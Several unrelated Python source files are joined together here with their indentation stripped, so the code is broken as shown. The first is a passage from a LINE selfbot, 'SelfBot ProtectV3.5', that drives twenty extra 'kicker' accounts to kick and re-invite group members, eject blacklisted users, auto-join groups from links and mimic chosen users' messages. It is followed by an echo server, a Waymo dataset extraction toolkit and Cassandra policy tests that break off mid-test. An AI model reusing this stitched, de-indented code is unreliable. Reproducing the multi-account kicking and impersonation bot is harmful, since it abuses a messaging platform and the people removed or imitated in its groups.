kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
pass
return
#==============================================================================================================
#==============================================[OP TYPE 22 24 JOIN]============================================
#==============================================================================================================
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 25:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
cmd = command(text)
setKey = settings['setKey']['key'] if settings['setKey']['status'] else ''
if text in tmp_text:
return tmp_text.remove(text)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
try:
executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey)
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(talk_error))
time.sleep(3)
except Exception as error:
logError(error)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(error))
time.sleep(3)
elif msg.contentType == 1: # Content type is image
if settings['changePictureProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/picture.jpg')
line.updateProfilePicture(path)
line.sendMessage(to, 'เปลี่ยนรูปโปรไฟล์เรียบร้อย')
settings['changePictureProfile'] = False
elif settings['changeCoverProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/cover.jpg')
line.updateProfileCover(path)
line.sendMessage(to, 'เปลี่ยนรูปปกเรียบร้อย')
settings['changeCoverProfile'] = False
elif to in settings['changeGroupPicture'] and msg.toType == 2:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/grouppicture.jpg')
line.updateGroupPicture(to, path)
line.sendMessage(to, 'เปลี่ยนรูปกลุ่มแล้ว')
settings['changeGroupPicture'].remove(to)
elif msg.contentType == 7: # Content type is sticker
if settings['checkSticker']:
res = '╭───「 Sticker Info 」'
res += '\n├ Sticker ID : ' + msg.contentMetadata['STKID']
res += '\n├ Sticker Packages ID : ' + msg.contentMetadata['STKPKGID']
res += '\n├ Sticker Version : ' + msg.contentMetadata['STKVER']
res += '\n├ Sticker Link : line://shop/detail/' + msg.contentMetadata['STKPKGID']
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 13: # Content type is contact
if settings['checkContact']:
mid = msg.contentMetadata['mid']
try:
contact = line.getContact(mid)
except:
return line.sendMessage(to, 'เกิดข้ผิดพลาดเฉียบพลัน ' + mid)
res = '╭───「 Details Contact 」'
res += '\n├ MID : ' + mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV3.5」'
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 16: # Content type is album/note
if settings['checkPost']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT', 'MH']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT']:
contact = line.getContact(sender)
author = contact.displayName
else:
author = msg.contentMetadata['serviceName']
posturl = msg.contentMetadata['postEndUrl']
res = '╭───「 Details Post 」'
res += '\n├ Creator : ' + author
res += '\n├ Post Link : ' + posturl
res += '\n╰───「SelfBot ProtectV3.5」'
elif op.type == 26:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
if settings['autoRead']:
kicker.sendChatChecked(to, msg_id)
kicker2.sendChatChecked(to, msg_id)
kicker3.sendChatChecked(to, msg_id)
kicker4.sendChatChecked(to, msg_id)
kicker5.sendChatChecked(to, msg_id)
kicker6.sendChatChecked(to, msg_id)
kicker7.sendChatChecked(to, msg_id)
kicker8.sendChatChecked(to, msg_id)
kicker9.sendChatChecked(to, msg_id)
kicker10.sendChatChecked(to, msg_id)
kicker11.sendChatChecked(to, msg_id)
kicker12.sendChatChecked(to, msg_id)
kicker13.sendChatChecked(to, msg_id)
kicker14.sendChatChecked(to, msg_id)
kicker15.sendChatChecked(to, msg_id)
kicker16.sendChatChecked(to, msg_id)
kicker17.sendChatChecked(to, msg_id)
kicker18.sendChatChecked(to, msg_id)
kicker19.sendChatChecked(to, msg_id)
kicker20.sendChatChecked(to, msg_id)
g1.sendChatChecked(to, msg_id)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'I\'m aleady on group ' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'Success join to group ' + group.name)
if settings['mimic']['status']:
if sender in settings['mimic']['target'] and settings['mimic']['target'][sender]:
try:
line.sendMessage(to, text, msg.contentMetadata)
tmp_text.append(text)
except:
pass
if settings['autoRespondMention']['status']:
if msg.toType in [1, 2] and 'MENTION' in msg.contentMetadata.keys() and sender != myMid and msg.contentType not in [6, 7, 9]:
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = [mention['M'] for mention in mentions['MENTIONEES']]
if myMid in mentionees:
if line.getProfile().displayName in text:
if '@!' not in settings['autoRespondMention']['message']:
line.sendMessage(to, settings['autoRespondMention']['message'])
else:
line.sendMentionV2(to, settings['autoRespondMention']['message'], [sender])
if settings['autoRespond']['status']:
if msg.toType == 0:
contact = line.getContact(sender)
if contact.attributes != 32 and 'MENTION' not in msg.contentMetadata.keys():
if '@!' not in settings['autoRespond']['message']:
line.sendMessage(to, settings['autoRespond']['message'])
else:
line.sendMentionV2(to, settings['autoRespond']['message'], [sender])
if op.type == 55:
if op.param1 in lurking:
if lurking[op.param1]['status'] and op.param2 not in lurking[op.param1]['members']:
lurking[op.param1]['members'].append(op.param2)
if lurking[op.param1]['reply']['status']:
if '@!' not in lurking[op.param1]['reply']['message']:
line.sendMessage(op.param1, lurking[op.param1]['reply']['message'])
else:
line.sendMentionV2(op.param1, lurking[op.param1]['reply']['message'], [op.param2])
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
except KeyboardInterrupt:
sys.exit('##---- KEYBOARD INTERRUPT -----##')
except Exception as error:
logError(error)
while True:
try:
ops = oepoll.singleTrace(count=80)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread1 = threading.Thread(target=executeOp, args=(op,))
thread1.daemon = True
thread1.start()
except Exception as e:
pass
|
threadecho.py | # A simple echo server with threads
from socket import *
from threading import Thread
def echo_server(addr):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR,1)
sock.bind(addr)
sock.listen(5)
while True:
client, addr = sock.accept()
Thread(target=echo_handler, args=(client, addr), daemon=True).start()
def echo_handler(client, addr):
print('Connection from', addr)
client.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
with client:
while True:
data = client.recv(100000)
if not data:
break
client.sendall(data)
print('Connection closed')
if __name__ == '__main__':
echo_server(('',25000))
|
util_image_label.py | """
Taken and Customized from:
https://github.com/KushalBKusram/WaymoDataToolkit
"""
import os
import cv2
import threading
import sys
import shutil
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
from google.protobuf.json_format import MessageToDict
from waymo_open_dataset import dataset_pb2 as open_dataset
class ToolKit:
def __init__(self, training_dir=None, testing_dir=None, validation_dir=None, save_dir=None):
self.segment = None
self.seg = None
self.last_frame = None
self.seg_number = 1
self.training_dir = training_dir
self.testing_dir = testing_dir
self.validation_dir = validation_dir
self.save_dir = save_dir
self.camera_dir = self.save_dir + "/camera"
self.camera_images_dir = self.camera_dir + "/images"
self.camera_labels_dir = self.camera_dir + "/labels"
if not os.path.exists(self.camera_dir):
os.makedirs(self.camera_dir)
if not os.path.exists(self.camera_images_dir):
os.makedirs(self.camera_images_dir)
if not os.path.exists(self.camera_labels_dir):
os.makedirs(self.camera_labels_dir)
#self.camera_list = ["UNKNOWN", "FRONT", "FRONT_LEFT", "FRONT_RIGHT", "SIDE_LEFT", "SIDE_RIGHT"]
self.camera_list = ["FRONT"] #Customized
self.img_vid_path = ''
self.lbl_vid_path = ''
def assign_segment(self, segment, seg_num):
self.segment = segment
self.seg = segment.split('_')[0][8:]
self.seg_number = seg_num
self.dataset = tf.data.TFRecordDataset("{}/{}".format(self.training_dir, self.segment), compression_type='')
vid_path1 = "{}/{}".format(self.camera_images_dir, self.get_vid_num())
self.prepare_path(vid_path1)
self.img_vid_path = vid_path1
vid_path2 = "{}/{}".format(self.camera_labels_dir, self.get_vid_num())
self.prepare_path(vid_path2)
self.lbl_vid_path = vid_path2
def list_training_segments(self):
seg_list = []
for file in os.listdir(self.training_dir):
if file.endswith(".tfrecord"):
seg_list.append(file)
return seg_list
def list_testing_segments(self):
pass
def list_validation_segments(self):
pass
def get_vid_num(self):
num_part = "%04.f" % self.seg_number
return 'video_' + num_part
#########################################################################
# Extract Camera Images and Labels
#########################################################################
# Extract Camera Image
def extract_image(self, ndx, frame):
for index, data in enumerate(frame.images): #"%05.f.png") % frame_num)
if index == 0 and data.name == 1: #Customized (0 & 1) for FRONT
decodedImage = tf.io.decode_jpeg(data.image, channels=3, dct_method='INTEGER_ACCURATE')
decodedImage = cv2.cvtColor(decodedImage.numpy(), cv2.COLOR_RGB2BGR)
file_name = "%05.f.png" % ndx
cv2.imwrite("{}/{}".format(self.img_vid_path, file_name), decodedImage)
# Extract Camera Label
def extract_labels(self, ndx, frame):
for index, data in enumerate(frame.camera_labels):
if index == 0 and data.name == 1: #Customized
camera = MessageToDict(data)
camera_name = camera["name"]
label_file = open("{}/{}_{}.txt".format(self.lbl_vid_path, self.seg, ndx), "w")
try:
labels = camera["labels"]
for label in labels:
x = label["box"]["centerX"]
y = label["box"]["centerY"]
width = label["box"]["width"]
length = label["box"]["length"]
obj_type = label["type"]
obj_id = label["id"]
label_file.write("{},{},{},{},{},{}\n".format(obj_type, x, y, length, width, obj_id))
if self.last_frame != self.seg and obj_type == 'TYPE_PEDESTRIAN':
self.last_frame = self.seg
#print(self.seg)
open("{}/camera/ped_frames_file.txt".format(self.save_dir), 'a+').write("{} \n".format(self.seg)).close()
except:
pass
label_file.close()
# Implemented Extraction as Threads
def threaded_camera_image_extraction(self, datasetAsList, range_value):
frame = open_dataset.Frame()
for frameIdx in range_value:
frame.ParseFromString(datasetAsList[frameIdx])
self.extract_image(frameIdx, frame)
self.extract_labels(frameIdx, frame)
# Function to call to extract images
def extract_camera_images(self):
open("{}/camera/last_file.txt".format(self.save_dir), 'w+').write(self.segment)
# Convert tfrecord to a list
datasetAsList = list(self.dataset.as_numpy_iterator())
totalFrames = len(datasetAsList)
threads = []
for i in self.batch(range(totalFrames), 30):
t = threading.Thread(target=self.threaded_camera_image_extraction, args=[datasetAsList, i])
t.start()
threads.append(t)
for thread in threads:
thread.join()
#########################################################################
# Consolidate Object Count per Camera and frontal_velocity, weather, time and location
#########################################################################
def consolidate(self):
if not os.path.isdir("{}/consolidation".format(self.save_dir)):
os.makedirs("{}/consolidation".format(self.save_dir))
# Convert tfrecord to a list
datasetAsList = list(self.dataset.as_numpy_iterator())
totalFrames = len(datasetAsList)
frame = open_dataset.Frame()
stat_file = open("{}/consolidation/{}.csv".format(self.save_dir, self.segment[:-9]), "w")
for frameIdx in range(totalFrames):
frame.ParseFromString(datasetAsList[frameIdx])
front_list = []
front_left_list = []
front_right_list = []
side_left_list = []
side_right_list = []
for index, data in enumerate(frame.camera_labels):
type_unknown = 0
type_vehicle = 0
type_ped = 0
type_sign = 0
type_cyclist = 0
camera = MessageToDict(data)
camera_name = camera["name"]
try:
labels = camera["labels"]
except:
labels = None
if labels is not None:
for label in labels:
if label["type"] == "TYPE_UNKNOWN":
type_unknown += 1
elif label["type"] == "TYPE_VEHICLE":
type_vehicle += 1
elif label["type"] == "TYPE_PEDESTRIAN":
type_ped += 1
elif label["type"] == "TYPE_SIGN":
type_sign += 1
elif label["type"] == 'TYPE_CYCLIST':
type_cyclist += 1
if camera_name == "FRONT":
front_list = [type_unknown, type_vehicle, type_ped, type_sign, type_cyclist]
elif camera_name == "FRONT_LEFT":
front_left_list = [type_unknown, type_vehicle, type_ped, type_sign, type_cyclist]
elif camera_name == "FRONT_RIGHT":
front_right_list = [type_unknown, type_vehicle, type_ped, type_sign, type_cyclist]
elif camera_name == "SIDE_LEFT":
side_left_list = [type_unknown, type_vehicle, type_ped, type_sign, type_cyclist]
elif camera_name == "SIDE_RIGHT":
side_right_list = [type_unknown, type_vehicle, type_ped, type_sign, type_cyclist]
else:
if camera_name == "FRONT":
front_list = [0, 0, 0, 0, 0]
elif camera_name == "FRONT_LEFT":
front_left_list = [0, 0, 0, 0, 0]
elif camera_name == "FRONT_RIGHT":
front_right_list = [0, 0, 0, 0, 0]
elif camera_name == "SIDE_LEFT":
side_left_list = [0, 0, 0, 0, 0]
elif camera_name == "SIDE_RIGHT":
side_right_list = [0, 0, 0, 0, 0]
obj_list = front_list + front_left_list + front_right_list + side_left_list + side_right_list
# determine the velocity
velocity = MessageToDict(frame.images[0])
stat_file.write("{},{},{},{},{}\n".format(','.join([str(obj_count) for obj_count in obj_list]), ','.join([str(vel) for vel in velocity["velocity"].values()]), frame.context.stats.weather, frame.context.stats.time_of_day, frame.context.stats.location))
#########################################################################
# Util Functions
#########################################################################
def delete_files(self, files):
for f in files:
try:
os.remove(f)
except OSError as e:
print("Error: %s : %s" % (f, e.strerror))
def batch(self, iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
def refresh_dir(self, dir):
if os.path.isdir(dir):
sys.stdout.write('Preparing Files . . . \r')
try:
shutil.rmtree(dir)
os.makedirs(dir, exist_ok=True)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
def prepare_path(self, f_path):
if not os.path.exists(f_path):
os.makedirs(f_path)
|
test_policies.py | # Copyright 2013-2014 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from itertools import islice, cycle
from mock import Mock
from random import randint
import six
import sys
import struct
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.metadata import Metadata
from cassandra.policies import (RoundRobinPolicy, DCAwareRoundRobinPolicy,
TokenAwarePolicy, SimpleConvictionPolicy,
HostDistance, ExponentialReconnectionPolicy,
RetryPolicy, WriteType,
DowngradingConsistencyRetryPolicy, ConstantReconnectionPolicy,
LoadBalancingPolicy, ConvictionPolicy, ReconnectionPolicy, FallthroughRetryPolicy)
from cassandra.pool import Host
from cassandra.query import Statement
from six.moves import xrange
class TestLoadBalancingPolicy(unittest.TestCase):
def test_non_implemented(self):
"""
Code coverage for interface-style base class
"""
policy = LoadBalancingPolicy()
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
self.assertRaises(NotImplementedError, policy.distance, host)
self.assertRaises(NotImplementedError, policy.populate, None, host)
self.assertRaises(NotImplementedError, policy.make_query_plan)
self.assertRaises(NotImplementedError, policy.on_up, host)
self.assertRaises(NotImplementedError, policy.on_down, host)
self.assertRaises(NotImplementedError, policy.on_add, host)
self.assertRaises(NotImplementedError, policy.on_remove, host)
def test_instance_check(self):
self.assertRaises(TypeError, Cluster, load_balancing_policy=RoundRobinPolicy)
class TestRoundRobinPolicy(unittest.TestCase):
def test_basic(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
def test_multiple_query_plans(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
for i in xrange(20):
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
def test_single_host(self):
policy = RoundRobinPolicy()
policy.populate(None, [0])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [0])
def test_status_updates(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
policy.on_down(0)
policy.on_remove(1)
policy.on_up(4)
policy.on_add(5)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), [2, 3, 4, 5])
def test_thread_safety(self):
hosts = range(100)
policy = RoundRobinPolicy()
policy.populate(None, hosts)
def check_query_plan():
for i in range(100):
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
threads = [Thread(target=check_query_plan) for i in range(4)]
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
def test_thread_safety_during_modification(self):
hosts = range(100)
policy = RoundRobinPolicy()
policy.populate(None, hosts)
errors = []
def check_query_plan():
try:
for i in xrange(100):
list(policy.make_query_plan())
except Exception as exc:
errors.append(exc)
def host_up():
for i in xrange(1000):
policy.on_up(randint(0, 99))
def host_down():
for i in xrange(1000):
policy.on_down(randint(0, 99))
threads = []
for i in range(5):
threads.append(Thread(target=check_query_plan))
threads.append(Thread(target=host_up))
threads.append(Thread(target=host_down))
# make the GIL switch after every instruction, maximizing
# the chace of race conditions
if six.PY2:
original_interval = sys.getcheckinterval()
else:
original_interval = sys.getswitchinterval()
try:
if six.PY2:
sys.setcheckinterval(0)
else:
sys.setswitchinterval(0.0001)
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
finally:
if six.PY2:
sys.setcheckinterval(original_interval)
else:
sys.setswitchinterval(original_interval)
if errors:
self.fail("Saw errors: %s" % (errors,))
def test_no_live_nodes(self):
"""
Ensure query plan for a downed cluster will execute without errors
"""
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
for i in range(4):
policy.on_down(i)
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
class DCAwareRoundRobinPolicyTest(unittest.TestCase):
def test_no_remote(self):
hosts = []
for i in range(4):
h = Host(i, SimpleConvictionPolicy)
h.set_location_info("dc1", "rack1")
hosts.append(h)
policy = DCAwareRoundRobinPolicy("dc1")
policy.populate(None, hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), sorted(hosts))
def test_with_remotes(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
local_hosts = set(h for h in hosts if h.datacenter == "dc1")
remote_hosts = set(h for h in hosts if h.datacenter != "dc1")
# allow all of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=2)
policy.populate(Mock(spec=Metadata), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
self.assertEqual(set(qplan[2:]), remote_hosts)
# allow only one of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(spec=Metadata), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
used_remotes = set(qplan[2:])
self.assertEqual(1, len(used_remotes))
self.assertIn(qplan[2], remote_hosts)
# allow no remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
policy.populate(Mock(spec=Metadata), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(2, len(qplan))
self.assertEqual(local_hosts, set(qplan))
def test_get_distance(self):
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
policy.populate(Mock(spec=Metadata), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
# used_hosts_per_remote_dc is set to 0, so ignore it
remote_host = Host("ip2", SimpleConvictionPolicy)
remote_host.set_location_info("dc2", "rack1")
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# dc2 isn't registered in the policy's live_hosts dict
policy.used_hosts_per_remote_dc = 1
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# make sure the policy has both dcs registered
policy.populate(Mock(spec=Metadata), [host, remote_host])
self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
# since used_hosts_per_remote_dc is set to 1, only the first
# remote host in dc2 will be REMOTE, the rest are IGNORED
second_remote_host = Host("ip3", SimpleConvictionPolicy)
second_remote_host.set_location_info("dc2", "rack1")
policy.populate(Mock(spec=Metadata), [host, remote_host, second_remote_host])
distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
def test_status_updates(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(spec=Metadata), hosts)
policy.on_down(hosts[0])
policy.on_remove(hosts[2])
new_local_host = Host(4, SimpleConvictionPolicy)
new_local_host.set_location_info("dc1", "rack1")
policy.on_up(new_local_host)
new_remote_host = Host(5, SimpleConvictionPolicy)
new_remote_host.set_location_info("dc9000", "rack1")
policy.on_add(new_remote_host)
# we now have two local hosts and two remote hosts in separate dcs
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
# since we have hosts in dc9000, the distance shouldn't be IGNORED
self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
policy.on_down(new_local_host)
policy.on_down(hosts[1])
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
policy.on_down(new_remote_host)
policy.on_down(hosts[3])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_no_live_nodes(self):
"""
Ensure query plan for a downed cluster will execute without errors
"""
hosts = []
for i in range(4):
h = Host(i, SimpleConvictionPolicy)
h.set_location_info("dc1", "rack1")
hosts.append(h)
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(spec=Metadata), hosts)
for host in hosts:
policy.on_down(host)
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_no_nodes(self):
"""
Ensure query plan for an empty cluster will execute without errors
"""
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(None, [])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
class TokenAwarePolicyTest(unittest.TestCase):
def test_wrap_round_robin(self):
cluster = Mock(spec=Cluster)
cluster.metadata = Mock(spec=Metadata)
hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
for host in hosts:
host.set_up()
def get_replicas(keyspace, packed_key):
index = struct.unpack('>i', packed_key)[0]
return list(islice(cycle(hosts), index, index + 2))
cluster.metadata.get_replicas.side_effect = get_replicas
policy = TokenAwarePolicy(RoundRobinPolicy())
policy.populate(cluster, hosts)
for i in range(4):
query = Statement(routing_key=struct.pack('>i', i))
qplan = list(policy.make_query_plan(None, query))
replicas = get_replicas(None, struct.pack('>i', i))
other = set(h for h in hosts if h not in replicas)
self.assertEqual(replicas, qplan[:2])
self.assertEqual(other, set(qplan[2:]))
# Should use the secondary policy
for i in range(4):
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set(hosts))
def test_wrap_dc_aware(self):
cluster = Mock(spec=Cluster)
cluster.metadata = Mock(spec=Metadata)
hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
for host in hosts:
host.set_up()
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
def get_replicas(keyspace, packed_key):
index = struct.unpack('>i', packed_key)[0]
# return one node from each DC
if index % 2 == 0:
return [hosts[0], hosts[2]]
else:
return [hosts[1], hosts[3]]
cluster.metadata.get_replicas.side_effect = get_replicas
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
policy.populate(cluster, hosts)
for i in range(4):
query = Statement(routing_key=struct.pack('>i', i))
qplan = list(policy.make_query_plan(None, query))
replicas = get_replicas(None, struct.pack('>i', i))
# first should be the only local replica
self.assertIn(qplan[0], replicas)
self.assertEqual(qplan[0].datacenter, "dc1")
# then the local non-replica
self.assertNotIn(qplan[1], replicas)
self.assertEqual(qplan[1].datacenter, "dc1")
# then one of the remotes (used_hosts_per_remote_dc is 1, so we
# shouldn't see two remotes)
self.assertEqual(qplan[2].datacenter, "dc2")
self.assertEqual(3, len(qplan))
class FakeCluster:
def __init__(self):
self.metadata = Mock(spec=Metadata)
def test_get_distance(self):
"""
Same test as DCAwareRoundRobinPolicyTest.test_get_distance()
Except a FakeCluster is needed for the metadata variable and
policy.child_policy is needed to change child policy settings
"""
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0))
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
policy.populate(self.FakeCluster(), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
# used_hosts_per_remote_dc is set to 0, so ignore it
remote_host = Host("ip2", SimpleConvictionPolicy)
remote_host.set_location_info("dc2", "rack1")
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# dc2 isn't registered in the policy's live_hosts dict
policy._child_policy.used_hosts_per_remote_dc = 1
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# make sure the policy has both dcs registered
policy.populate(self.FakeCluster(), [host, remote_host])
self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
# since used_hosts_per_remote_dc is set to 1, only the first
# remote host in dc2 will be REMOTE, the rest are IGNORED
second_remote_host = Host("ip3", SimpleConvictionPolicy)
second_remote_host.set_location_info("dc2", "rack1")
policy.populate(self.FakeCluster(), [host, remote_host, second_remote_host])
distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
def test_status_updates(self):
"""
Same test as DCAwareRoundRobinPolicyTest.test_status_updates()
"""
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
policy.populate(self.FakeCluster(), hosts)
policy.on_down(hosts[0])
policy.on_remove(hosts[2])
new_local_host = Host(4, SimpleConvictionPolicy)
new_local_host.set_location_info("dc1", "rack1")
policy.on_up(new_local_host)
new_remote_host = Host(5, SimpleConvictionPolicy)
